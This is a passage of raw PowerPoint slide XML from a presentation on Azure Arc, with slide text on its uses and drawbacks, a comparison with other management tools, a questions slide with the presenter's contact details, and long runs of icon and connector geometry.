              <a:t>currently in preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It is a lot to digest and so many different portals/options to make it a bit cumbersome to implement and use efficiently.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Really useful for Edge locations in combination with Azure native environments.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F0B73E-EEDA-269D-C455-A2D74E459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How does Arc compare to other Management Tools?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028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tel 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{612ACBED-DCB7-0F8A-F276-AE3C7F643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860" y="654833"/>
            <a:ext cx="10751504" cy="875651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="3600" dirty="0"/>
              <a:t>Questions? / if-time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607613E-225E-16C6-758A-E072366581AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852791" y="1526946"/>
            <a:ext cx="6783697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nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/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177CC0-D11F-B612-7625-32414157BB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899809" y="1270783"/>
            <a:ext cx="6783697" cy="494843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Contact: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>msandbu@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" b="1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nb-NO" b="1" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Twitter: @msandbu</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="nb-NO" dirty="0"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nb-NO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14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5FC2144-91FD-BF10-FB07-C2D932C172D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356060" y="3813242"/>
            <a:ext cx="3119336" cy="2081719"/>
          </a:xfrm>
          <a:prstGeom prst="round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0C0BB1B-6C0F-1A72-B41D-EA4E03D45954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8398213" y="1582366"/>
            <a:ext cx="3119336" cy="1964988"/>
          </a:xfrm>
          <a:prstGeom prst="round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0200AC-74CB-44E1-B1DA-66F71460A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7" y="739140"/>
            <a:ext cx="10751504" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> is Azure Arc? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Rectangle 331">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8267AE07-70A4-47F5-B4F1-79690BE8528C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781049" y="3577871"/>
            <a:ext cx="1404555" cy="775183"/>
          </a:xfrm>
          <a:prstGeom prst="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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Azure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="333" name="Connector: Elbow 332">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D4680D7-E45B-411A-91C0-C94BF6B92E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1672780" y="4473294"/>
            <a:ext cx="1231151" cy="1209100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100505"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx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4" name="Connector: Elbow 333">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCBEF082-8611-457C-873D-D5D6251AD5A3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643417" y="2233396"/>
            <a:ext cx="1265905" cy="1190878"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99660"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx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5" name="Straight Arrow Connector 334">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C10F98B1-5AE7-47C6-9898-556F125CE9A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2342335" y="3970357"/>
            <a:ext cx="529474" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx1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Rectangle: Rounded Corners 335">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C05289E7-0FE9-4528-9F63-2B414127B500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946400" y="1778000"/>
            <a:ext cx="1987550" cy="4286250"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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337" name="Group 398">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DEFFD40-F79E-4A25-AD0A-DBB9B4DFB0C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3422649" y="2096190"/>
            <a:ext cx="695951" cy="580454"/>
            <a:chOff x="4144963" y="227013"/>
            <a:chExt cx="746125" cy="622300"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="338" name="Freeform 379">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F409ADD-F6E1-4C65-A0A7-B67572629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400" y="227013"/>
              <a:ext cx="166688" cy="309563"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 373 w 399"/>
                <a:gd name="T1" fmla="*/ 735 h 735"/>
                <a:gd name="T2" fmla="*/ 348 w 399"/>
                <a:gd name="T3" fmla="*/ 710 h 735"/>
                <a:gd name="T4" fmla="*/ 348 w 399"/>
                <a:gd name="T5" fmla="*/ 92 h 735"/>
                <a:gd name="T6" fmla="*/ 306 w 399"/>
                <a:gd name="T7" fmla="*/ 51 h 735"/>
                <a:gd name="T8" fmla="*/ 25 w 399"/>
                <a:gd name="T9" fmla="*/ 51 h 735"/>
                <a:gd name="T10" fmla="*/ 0 w 399"/>
                <a:gd name="T11" fmla="*/ 25 h 735"/>
                <a:gd name="T12" fmla="*/ 25 w 399"/>
                <a:gd name="T13" fmla="*/ 0 h 735"/>
                <a:gd name="T14" fmla="*/ 306 w 399"/>
                <a:gd name="T15" fmla="*/ 0 h 735"/>
                <a:gd name="T16" fmla="*/ 399 w 399"/>
                <a:gd name="T17" fmla="*/ 92 h 735"/>
                <a:gd name="T18" fmla="*/ 399 w 399"/>
                <a:gd name="T19" fmla="*/ 710 h 735"/>
                <a:gd name="T20" fmla="*/ 373 w 399"/>
                <a:gd name="T21" fmla="*/ 735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735">
                  <a:moveTo>
                    <a:pt x="373" y="735"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="735"/>
                    <a:pt x="348" y="724"/>
                    <a:pt x="348" y="710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="92"/>
                    <a:pt x="348" y="92"/>
                    <a:pt x="348" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="69"/>
                    <a:pt x="329" y="51"/>
                    <a:pt x="306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306" y="0"/>
                    <a:pt x="306" y="0"/>
                    <a:pt x="306" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="0"/>
                    <a:pt x="399" y="42"/>
                    <a:pt x="399" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="710"/>
                    <a:pt x="399" y="710"/>
                    <a:pt x="399" y="710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="724"/>
                    <a:pt x="387" y="735"/>
                    <a:pt x="373" y="7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39" name="Freeform 380">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D4CCB00-C34B-4EB1-9CA5-6385B7532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525" y="555625"/>
              <a:ext cx="561975" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1246 w 1338"/>
                <a:gd name="T1" fmla="*/ 375 h 375"/>
                <a:gd name="T2" fmla="*/ 26 w 1338"/>
                <a:gd name="T3" fmla="*/ 375 h 375"/>
                <a:gd name="T4" fmla="*/ 0 w 1338"/>
                <a:gd name="T5" fmla="*/ 349 h 375"/>
                <a:gd name="T6" fmla="*/ 26 w 1338"/>
                <a:gd name="T7" fmla="*/ 324 h 375"/>
                <a:gd name="T8" fmla="*/ 1246 w 1338"/>
                <a:gd name="T9" fmla="*/ 324 h 375"/>
                <a:gd name="T10" fmla="*/ 1287 w 1338"/>
                <a:gd name="T11" fmla="*/ 282 h 375"/>
                <a:gd name="T12" fmla="*/ 1287 w 1338"/>
                <a:gd name="T13" fmla="*/ 26 h 375"/>
                <a:gd name="T14" fmla="*/ 1313 w 1338"/>
                <a:gd name="T15" fmla="*/ 0 h 375"/>
                <a:gd name="T16" fmla="*/ 1338 w 1338"/>
                <a:gd name="T17" fmla="*/ 26 h 375"/>
                <a:gd name="T18" fmla="*/ 1338 w 1338"/>
                <a:gd name="T19" fmla="*/ 282 h 375"/>
                <a:gd name="T20" fmla="*/ 1246 w 1338"/>
                <a:gd name="T21" fmla="*/ 37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38" h="375">
                  <a:moveTo>
                    <a:pt x="1246" y="375"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="375"/>
                    <a:pt x="26" y="375"/>
                    <a:pt x="26" y="375"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="375"/>
                    <a:pt x="0" y="363"/>
                    <a:pt x="0" y="349"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="335"/>
                    <a:pt x="12" y="324"/>
                    <a:pt x="26" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1246" y="324"/>
                    <a:pt x="1246" y="324"/>
                    <a:pt x="1246" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1269" y="324"/>
                    <a:pt x="1287" y="305"/>
                    <a:pt x="1287" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1287" y="26"/>
                    <a:pt x="1287" y="26"/>
                    <a:pt x="1287" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1287" y="12"/>
                    <a:pt x="1299" y="0"/>
                    <a:pt x="1313" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1327" y="0"/>
                    <a:pt x="1338" y="12"/>
                    <a:pt x="1338" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1338" y="282"/>
                    <a:pt x="1338" y="282"/>
                    <a:pt x="1338" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1338" y="333"/>
                    <a:pt x="1297" y="375"/>
                    <a:pt x="1246" y="3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0" name="Freeform 381">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8350F259-D8B4-4043-89C1-AB5DBAF88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4963" y="227013"/>
              <a:ext cx="560388" cy="485775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 364 w 1333"/>
                <a:gd name="T1" fmla="*/ 1155 h 1155"/>
                <a:gd name="T2" fmla="*/ 92 w 1333"/>
                <a:gd name="T3" fmla="*/ 1155 h 1155"/>
                <a:gd name="T4" fmla="*/ 0 w 1333"/>
                <a:gd name="T5" fmla="*/ 1062 h 1155"/>
                <a:gd name="T6" fmla="*/ 0 w 1333"/>
                <a:gd name="T7" fmla="*/ 92 h 1155"/>
                <a:gd name="T8" fmla="*/ 92 w 1333"/>
                <a:gd name="T9" fmla="*/ 0 h 1155"/>
                <a:gd name="T10" fmla="*/ 1308 w 1333"/>
                <a:gd name="T11" fmla="*/ 0 h 1155"/>
                <a:gd name="T12" fmla="*/ 1333 w 1333"/>
                <a:gd name="T13" fmla="*/ 25 h 1155"/>
                <a:gd name="T14" fmla="*/ 1308 w 1333"/>
                <a:gd name="T15" fmla="*/ 51 h 1155"/>
                <a:gd name="T16" fmla="*/ 92 w 1333"/>
                <a:gd name="T17" fmla="*/ 51 h 1155"/>
                <a:gd name="T18" fmla="*/ 50 w 1333"/>
                <a:gd name="T19" fmla="*/ 92 h 1155"/>
                <a:gd name="T20" fmla="*/ 50 w 1333"/>
                <a:gd name="T21" fmla="*/ 1062 h 1155"/>
                <a:gd name="T22" fmla="*/ 92 w 1333"/>
                <a:gd name="T23" fmla="*/ 1104 h 1155"/>
                <a:gd name="T24" fmla="*/ 364 w 1333"/>
                <a:gd name="T25" fmla="*/ 1104 h 1155"/>
                <a:gd name="T26" fmla="*/ 389 w 1333"/>
                <a:gd name="T27" fmla="*/ 1129 h 1155"/>
                <a:gd name="T28" fmla="*/ 364 w 1333"/>
                <a:gd name="T29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333" h="1155">
                  <a:moveTo>
                    <a:pt x="364" y="1155"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="1155"/>
                    <a:pt x="92" y="1155"/>
                    <a:pt x="92" y="1155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="1155"/>
                    <a:pt x="0" y="1113"/>
                    <a:pt x="0" y="106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42"/>
                    <a:pt x="41" y="0"/>
                    <a:pt x="92" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1308" y="0"/>
                    <a:pt x="1308" y="0"/>
                    <a:pt x="1308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1322" y="0"/>
                    <a:pt x="1333" y="11"/>
                    <a:pt x="1333" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1333" y="39"/>
                    <a:pt x="1322" y="51"/>
                    <a:pt x="1308" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="51"/>
                    <a:pt x="92" y="51"/>
                    <a:pt x="92" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="51"/>
                    <a:pt x="50" y="69"/>
                    <a:pt x="50" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1062"/>
                    <a:pt x="50" y="1062"/>
                    <a:pt x="50" y="1062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1085"/>
                    <a:pt x="69" y="1104"/>
                    <a:pt x="92" y="1104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="1104"/>
                    <a:pt x="364" y="1104"/>
                    <a:pt x="364" y="1104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="378" y="1104"/>
                    <a:pt x="389" y="1115"/>
                    <a:pt x="389" y="1129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="1143"/>
                    <a:pt x="378" y="1155"/>
                    <a:pt x="364" y="11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1" name="Freeform 382">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD00EA49-7648-4F47-9C21-C5CDD7AB4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4963" y="644525"/>
              <a:ext cx="741363" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1740 w 1765"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 25 w 1765"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 1765"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 25 w 1765"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 1740 w 1765"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 1765 w 1765"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 1740 w 1765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5" h="50">
                  <a:moveTo>
                    <a:pt x="1740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740" y="0"/>
                    <a:pt x="1740" y="0"/>
                    <a:pt x="1740" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1754" y="0"/>
                    <a:pt x="1765" y="11"/>
                    <a:pt x="1765" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1765" y="39"/>
                    <a:pt x="1754" y="50"/>
                    <a:pt x="1740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2" name="Freeform 383">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA1B7BE-7A5A-42AF-9337-D7C4EAE40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8500" y="698500"/>
              <a:ext cx="131763" cy="150813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 245 w 315"/>
                <a:gd name="T1" fmla="*/ 359 h 359"/>
                <a:gd name="T2" fmla="*/ 26 w 315"/>
                <a:gd name="T3" fmla="*/ 359 h 359"/>
                <a:gd name="T4" fmla="*/ 0 w 315"/>
                <a:gd name="T5" fmla="*/ 334 h 359"/>
                <a:gd name="T6" fmla="*/ 26 w 315"/>
                <a:gd name="T7" fmla="*/ 308 h 359"/>
                <a:gd name="T8" fmla="*/ 245 w 315"/>
                <a:gd name="T9" fmla="*/ 308 h 359"/>
                <a:gd name="T10" fmla="*/ 253 w 315"/>
                <a:gd name="T11" fmla="*/ 307 h 359"/>
                <a:gd name="T12" fmla="*/ 261 w 315"/>
                <a:gd name="T13" fmla="*/ 298 h 359"/>
                <a:gd name="T14" fmla="*/ 260 w 315"/>
                <a:gd name="T15" fmla="*/ 287 h 359"/>
                <a:gd name="T16" fmla="*/ 258 w 315"/>
                <a:gd name="T17" fmla="*/ 284 h 359"/>
                <a:gd name="T18" fmla="*/ 154 w 315"/>
                <a:gd name="T19" fmla="*/ 24 h 359"/>
                <a:gd name="T20" fmla="*/ 181 w 315"/>
                <a:gd name="T21" fmla="*/ 0 h 359"/>
                <a:gd name="T22" fmla="*/ 204 w 315"/>
                <a:gd name="T23" fmla="*/ 27 h 359"/>
                <a:gd name="T24" fmla="*/ 290 w 315"/>
                <a:gd name="T25" fmla="*/ 245 h 359"/>
                <a:gd name="T26" fmla="*/ 304 w 315"/>
                <a:gd name="T27" fmla="*/ 262 h 359"/>
                <a:gd name="T28" fmla="*/ 309 w 315"/>
                <a:gd name="T29" fmla="*/ 315 h 359"/>
                <a:gd name="T30" fmla="*/ 270 w 315"/>
                <a:gd name="T31" fmla="*/ 355 h 359"/>
                <a:gd name="T32" fmla="*/ 245 w 315"/>
                <a:gd name="T33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5" h="359">
                  <a:moveTo>
                    <a:pt x="245" y="359"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="359"/>
                    <a:pt x="26" y="359"/>
                    <a:pt x="26" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="359"/>
                    <a:pt x="0" y="348"/>
                    <a:pt x="0" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="320"/>
                    <a:pt x="12" y="308"/>
                    <a:pt x="26" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="308"/>
                    <a:pt x="245" y="308"/>
                    <a:pt x="245" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="308"/>
                    <a:pt x="250" y="308"/>
                    <a:pt x="253" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="306"/>
                    <a:pt x="259" y="303"/>
                    <a:pt x="261" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262" y="296"/>
                    <a:pt x="263" y="292"/>
                    <a:pt x="260" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="286"/>
                    <a:pt x="259" y="285"/>
                    <a:pt x="258" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="190"/>
                    <a:pt x="153" y="31"/>
                    <a:pt x="154" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="10"/>
                    <a:pt x="167" y="0"/>
                    <a:pt x="181" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="1"/>
                    <a:pt x="205" y="13"/>
                    <a:pt x="204" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="29"/>
                    <a:pt x="197" y="168"/>
                    <a:pt x="290" y="245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="250"/>
                    <a:pt x="300" y="255"/>
                    <a:pt x="304" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="278"/>
                    <a:pt x="315" y="297"/>
                    <a:pt x="309" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="334"/>
                    <a:pt x="288" y="348"/>
                    <a:pt x="270" y="355"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262" y="358"/>
                    <a:pt x="254" y="359"/>
                    <a:pt x="245" y="3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3" name="Freeform 384">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EACE073-E0CF-4A23-B059-C88DE4B6A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4200" y="698500"/>
              <a:ext cx="131763" cy="150813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 289 w 314"/>
                <a:gd name="T1" fmla="*/ 360 h 360"/>
                <a:gd name="T2" fmla="*/ 70 w 314"/>
                <a:gd name="T3" fmla="*/ 360 h 360"/>
                <a:gd name="T4" fmla="*/ 44 w 314"/>
                <a:gd name="T5" fmla="*/ 356 h 360"/>
                <a:gd name="T6" fmla="*/ 6 w 314"/>
                <a:gd name="T7" fmla="*/ 316 h 360"/>
                <a:gd name="T8" fmla="*/ 11 w 314"/>
                <a:gd name="T9" fmla="*/ 263 h 360"/>
                <a:gd name="T10" fmla="*/ 24 w 314"/>
                <a:gd name="T11" fmla="*/ 246 h 360"/>
                <a:gd name="T12" fmla="*/ 110 w 314"/>
                <a:gd name="T13" fmla="*/ 28 h 360"/>
                <a:gd name="T14" fmla="*/ 134 w 314"/>
                <a:gd name="T15" fmla="*/ 1 h 360"/>
                <a:gd name="T16" fmla="*/ 161 w 314"/>
                <a:gd name="T17" fmla="*/ 25 h 360"/>
                <a:gd name="T18" fmla="*/ 57 w 314"/>
                <a:gd name="T19" fmla="*/ 285 h 360"/>
                <a:gd name="T20" fmla="*/ 54 w 314"/>
                <a:gd name="T21" fmla="*/ 288 h 360"/>
                <a:gd name="T22" fmla="*/ 54 w 314"/>
                <a:gd name="T23" fmla="*/ 299 h 360"/>
                <a:gd name="T24" fmla="*/ 62 w 314"/>
                <a:gd name="T25" fmla="*/ 308 h 360"/>
                <a:gd name="T26" fmla="*/ 70 w 314"/>
                <a:gd name="T27" fmla="*/ 309 h 360"/>
                <a:gd name="T28" fmla="*/ 289 w 314"/>
                <a:gd name="T29" fmla="*/ 309 h 360"/>
                <a:gd name="T30" fmla="*/ 314 w 314"/>
                <a:gd name="T31" fmla="*/ 335 h 360"/>
                <a:gd name="T32" fmla="*/ 289 w 314"/>
                <a:gd name="T33" fmla="*/ 36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4" h="360">
                  <a:moveTo>
                    <a:pt x="289" y="360"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="360"/>
                    <a:pt x="70" y="360"/>
                    <a:pt x="70" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="360"/>
                    <a:pt x="52" y="359"/>
                    <a:pt x="44" y="356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="349"/>
                    <a:pt x="13" y="335"/>
                    <a:pt x="6" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="298"/>
                    <a:pt x="1" y="279"/>
                    <a:pt x="11" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="256"/>
                    <a:pt x="19" y="251"/>
                    <a:pt x="24" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="169"/>
                    <a:pt x="110" y="30"/>
                    <a:pt x="110" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="14"/>
                    <a:pt x="120" y="2"/>
                    <a:pt x="134" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="0"/>
                    <a:pt x="160" y="11"/>
                    <a:pt x="161" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="32"/>
                    <a:pt x="170" y="191"/>
                    <a:pt x="57" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="286"/>
                    <a:pt x="55" y="287"/>
                    <a:pt x="54" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="293"/>
                    <a:pt x="53" y="297"/>
                    <a:pt x="54" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
